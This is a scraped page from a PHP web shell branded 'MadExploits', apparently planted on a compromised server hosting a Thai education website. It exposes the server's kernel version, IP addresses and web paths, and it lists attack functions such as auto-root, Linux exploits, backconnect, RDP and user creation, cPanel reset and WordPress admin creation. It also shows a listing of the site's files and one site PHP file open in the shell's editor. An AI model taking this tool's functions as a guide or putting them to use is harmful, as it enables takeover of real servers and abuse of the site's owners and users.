Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.190.152.109
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
myeducation.co.th /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
UserFiles
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
1Head.php
8.88
KB
-rw-r--r--
2HeadMenu.php
2.27
KB
-rw-r--r--
2banner.php
105
B
-rw-r--r--
2banner_mo.php
9.16
KB
-rw-r--r--
2banner_pc.php
3.81
KB
-rw-r--r--
3Footer.php
227
B
-rw-r--r--
4End.php
1.39
KB
-rw-r--r--
about.php
3.46
KB
-rw-r--r--
banner_next_country.php
3.1
KB
-rw-r--r--
banner_next_student_reviews.ph...
3.13
KB
-rw-r--r--
call_contact_mo.php
16.06
KB
-rw-r--r--
call_contact_pc.php
4.2
KB
-rw-r--r--
city.php
7.28
KB
-rw-r--r--
contact.php
5.92
KB
-rw-r--r--
country.php
5.72
KB
-rw-r--r--
detail.php
284
B
-rw-r--r--
detail_gallery.php
4.28
KB
-rw-r--r--
detail_mo.php
39.4
KB
-rw-r--r--
detail_promotion.php
3.01
KB
-rw-r--r--
detail_student_reviews.php
2.89
KB
-rw-r--r--
detail_tip.php
3.56
KB
-rw-r--r--
footer_mo.php
6.66
KB
-rw-r--r--
footer_pc.php
6.79
KB
-rw-r--r--
gallery.php
7.37
KB
-rw-r--r--
head_footer_3.php
3.59
KB
-rw-r--r--
hotpromotion.php
6.83
KB
-rw-r--r--
index.php
171
B
-rw-r--r--
index_country.php
121
B
-rw-r--r--
index_country_mo.php
4.38
KB
-rw-r--r--
index_country_pc.php
4
KB
-rw-r--r--
index_gallery.php
9.77
KB
-rw-r--r--
index_hot_promotion.php
9.2
KB
-rw-r--r--
index_student_reviews.php
9.87
KB
-rw-r--r--
index_video.php
4.54
KB
-rw-r--r--
shool.php
4.71
KB
-rw-r--r--
student_reviews.php
6.77
KB
-rw-r--r--
tip.php
7.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : call_contact_pc.php
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> <style> body { margin: 0; height: 2000px; } .icon-bar { position: fixed; top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%); } .icon-bar a { display: block; text-align: center; padding: 16px; transition: all 0.3s ease; color: white; font-size: 20px; } .icon-bar a:hover { background-color: #000; } .facebook { background: #3B5998; color: white; } .twitter { background: #55ACEE; color: white; } .google { background: #dd4b39; color: white; } .linkedin { background: #007bb5; color: white; } .youtube { background: #bb0000; color: white; } .content { margin-left: 75px; font-size: 30px; } </style> <div class="icon-bar" style="z-index: 9;"> <?PHP $HomeID = '112'; $SQL_Home = " SELECT home.Home_ID, home.Member_ID, member.Member_NameEN, member.Position_ID, position.Position_Name, home.Home_Date, home.Home_Time, home.Home_Visitors, home.Home_Sub, home.Home_Short,home.Home_Short2,home.Home_Short3, home.Home_Detail, home.Home_Category, home.StatusHome_ID, status_home.StatusHome_Name, home.StatusShowPage_ID, status_showpage.StatusShowPage_Name FROM status_showpage INNER JOIN (status_home INNER JOIN (position INNER JOIN (member INNER JOIN home ON member.Member_ID = home.Member_ID) ON position.Position_ID = member.Position_ID) ON status_home.StatusHome_ID = home.StatusHome_ID) ON status_showpage.StatusShowPage_ID = home.StatusShowPage_ID WHERE home.StatusHome_ID = 1 AND home.StatusShowPage_ID = '$HomeID' ORDER BY home.Home_ID asc LIMIT 9 "; $objQuery_Home = $objConnect->query($SQL_Home); while ($objResult_Home = mysqli_fetch_array($objQuery_Home)) { $HomeID = $objResult_Home["Home_ID"]; $HomeSub = $objResult_Home["Home_Sub"]; $HomeShort = $objResult_Home["Home_Short"]; $HomeDetail = $objResult_Home["Home_Detail"]; $HomeShort2 = $objResult_Home["Home_Short2"]; $HomeShort3 = $objResult_Home["Home_Short3"]; $HomeDate = $objResult_Home["Home_Date"]; $StatusShowPageID = $objResult_Home["StatusShowPage_ID"]; $Home_Visitors = $objResult_Home["Home_Visitors"]; $date = date_create($HomeDate); $NewDate = date_format($date, "F d , Y"); $NewDate1 = date_format($date, "d"); $NewDate2 = date_format($date, "F"); // Show img only LIMIT 1 $SQL_Home_Img = " SELECT img_home.Home_ID, img_home.ImgHome_Img, img_home.ImgHome_Sort, img_home.StatusImgHome_ID FROM img_home WHERE img_home.Home_ID = $HomeID ORDER BY img_home.ImgHome_Sort ASC LIMIT 1 "; $objQuery_Home_Img = $objConnect->query($SQL_Home_Img); // พากหัว หลัก if ($HomeSub == "-") { $Check_HomeSub2 = ""; } else { $Check_HomeSub2 = $HomeSub; } //map if ($HomeShort == "-") { $Check_HomeShort2 = ""; } else { $Check_HomeShort2 = $HomeShort; } //เกริน if ($HomeDetail == "-") { $Check_HomeShort3 = ""; } else { $Check_HomeShort3 = $HomeShort2; } //เวลา if ($HomeDetail == "-") { $Check_HomeShort4 = ""; } else { $Check_HomeShort4 = $HomeShort3; } //รายละเอียด if ($HomeDetail == "-") { $Check_HomeDetai2 = ""; } else { $Check_HomeDetai2 = $HomeDetail; } ?> <?PHP while ($objResult_Home_Img = mysqli_fetch_array($objQuery_Home_Img)) { $HomeID_Img = $objResult_Home_Img["Home_ID"]; $HomeImg_Img = $objResult_Home_Img["ImgHome_Img"]; ?> <a href="<?= $Check_HomeShort2; ?>" class="<?= $Check_HomeSub2; ?>"><i class="fa"><img src="model/upload/img/IMG_Home/<?= $HomeImg_Img; ?>" style="width: 35px;"></i></a> <?PHP } ?> <?PHP } ?> </div> <style> .line { background: #4CAF50; } .instagram { background-image: linear-gradient(to right, red , #E91E63); } .mail { background: #00bcd4; } </style>
Close